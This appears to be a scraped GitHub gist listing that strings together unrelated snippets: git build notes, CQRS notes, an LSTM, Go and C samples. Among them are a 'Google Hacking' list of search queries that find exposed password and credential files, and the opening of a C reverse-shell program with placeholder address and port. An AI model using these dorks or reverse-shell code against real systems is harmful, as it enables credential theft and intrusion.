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@cmartinbaughman
cmartinbaughman / GoogleHackMasterList.txt
Last active July 6, 2024 23:16
The definitive super list for "Google Hacking".
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www” domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@samrocketman
samrocketman / compile_git.md
Last active October 24, 2022 06:03
Compiling git

The version of git that comes with RHEL6 is very old. I'll outline steps for compiling the latest git version on RHEL6. Working from /usr/local/src.

Following instructions for Git Pro book Getting Started Installing Git.

Prerequisites

yum install gcc curl-devel expat-devel gettext-devel openssl-devel zlib-devel perl-ExtUtils-MakeMaker

Optional man page prereqs.

@jaceklaskowski
jaceklaskowski / Rough Notes about CQRS and ES.md
Last active June 13, 2024 02:32
Rough Notes about CQRS and ES

Rough Notes about CQRS and ES

Once upon a time…

I once took notes (almost sentence by sentence with not much editing) about the architectural design concepts - Command and Query Responsibility Segregation (CQRS) and Event Sourcing (ES) - from a presentation of Greg Young and published it as a gist (with the times when a given sentence was heard).

I then found other summaries of the talk and the gist has since been growing up. See the revisions to know the changes and where they came from (aka the sources).

It seems inevitable to throw Domain Driven Design (DDD) in to the mix.

@0xabe-io
0xabe-io / reverse_shell.c
Created January 6, 2015 15:24
Simple C code to create a reverse shell
/* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define REMOTE_ADDR "XXX.XXX.XXX.XXX"
#define REMOTE_PORT XXX
@talwai
talwai / servefile.sh
Created January 23, 2015 19:57
One-shot HTTP webserver to serve file contents using netcat
{ echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c <some.file)\r\n\r\n"; cat some.file; } | nc -l 8080
@karpathy
karpathy / gist:587454dc0146a6ae21fc
Last active July 11, 2024 10:36
An efficient, batched LSTM.
"""
This is a batched LSTM forward and backward pass
"""
import numpy as np
import code
class LSTM:
@staticmethod
def init(input_size, hidden_size, fancy_forget_bias_init = 3):
@tailriver
tailriver / dlopen_sample.c
Created November 18, 2015 04:21
A sample of using dlopen library.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dlfcn.h>
int main(int argc, char** argv)
{
void *handle;
void (*func_print_name)(const char*);
#!/bin/bash
objdump -d "${1}" | grep -Eo '\$0x[0-9a-f]+' | cut -c 2- | sort -u | while read const; do echo $const | python -c 'import sys, struct; sys.stdout.write("".join(struct.pack("<I" if len(l) <= 11 else "<Q", int(l,0)) for l in sys.stdin.readlines()))' > testcases/$const; done
i=0; strings "${1}"| while read line; do echo -n "$line" > testcases/string_${i} ; i=$[ $i + 1 ] ; done
@P1kachu
P1kachu / calling_printf_osx.c
Created November 24, 2016 20:30
Calling printf in OSX - The overkill way
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach-o/dyld.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld_images.h>
#include <mach/mach_vm.h>
/* Dyld is the OSX Dynamic Linker
* /usr/include//mach-o/loader.h
@bbengfort
bbengfort / noplog.go
Created March 20, 2017 20:42
No-op logger to turn off logging in Go without too much of a performance hit.
package noplog
import "log"
var noplog = &NopLogger{
log.New(NullWriter(1), "", log.LstdFlags),
}
// NullWriter implements the io.Write interface but doesn't do anything.
type NullWriter int